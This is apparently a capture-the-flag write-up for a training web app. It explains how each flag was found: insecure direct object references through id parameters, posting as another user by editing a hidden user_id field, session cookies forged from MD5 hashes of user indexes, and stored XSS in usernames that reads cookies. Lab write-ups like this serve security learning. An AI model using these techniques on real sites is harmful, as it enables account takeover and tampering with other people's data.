Flag 0

User is to user as Password is to...

Flag 1

Simply navigate to a URL for a post by id: http://{ctf}/83e2a28450/index.php?page=view.php&id=2

easy peazy

Flag 2

There is a hidden field on the form input for posting a new post. Go ahead and set that to any value you want and post as someone else!

<input name="user_id" value="2" type="hidden">

Flag 3

I had to use a hint on this one. The hint is simply 189 * 5. Well, that's 945, what's the significance of that? I tried a bunch of things and then tried http://{ctf}/5bc75e8e8a/index.php?page=view.php&id=945. Ok, that's a flag. Probably could have used some tools to try all the ids from 0 to a bazillion.

Flag 4

Well, if you can read a post using any valid URL, can you also edit a post? http://{ctf}/83e2a28450/index.php?page=edit.php&id=2 Yup, you can now edit the "private" post. Throw some of your own text in there and upon submitting you've captured #4

Flag 5

Cookies are stable across sessions, i.e. if you sign out and sign back in, you get the same cookie as the first time. Aha! The cookie is just the MD5 hash of the user's index:

(md5 "3")
"eccbc87e4b5ce2fe28308fd9f2a7baf3"

Substitute for another index and you have a session cookie for another user!

(md5 "1")
"c4ca4238a0b923820dcc509a6f75849b"

Flag 6

Wrong idea

Well, it looks like there is rudimentary validation performed (client side) when entering a username, but once you've created an account you can alter the username and no validation occurs. That means you can have your username be some Javascript and it will execute whenever someone visits the page(s) that render your posts and your username as the Author.

That works, I am able to perform alerts, and even read and output cookies with document.cookie because it is not marked as HTTP only.

After hint

Had to use another hint, looks like I was barking up the wrong tree. The hint leads us to believe we can mess with deleting posts if we can figure out what the id parameter is based on.

• MD5 hash of the username, post contents, etc.? Nope
• Base64 encoded something? Not that I can tell.

After giving up for the night, I returned today and fired up a new instance of the challenge. I had recorded the URLs from last night and lo and behold, my first post today had the same id as the first post yesterday! Same for second, third, etc. posts. That's got to mean something useful, right?

Oh, duh, the id parameter is the MD5 hash of the post index as a string:

(md5 "3")
"eccbc87e4b5ce2fe28308fd9f2a7baf3"

You can just delete anyone's posts by using their id and your logged in session cookie!

COMPLETE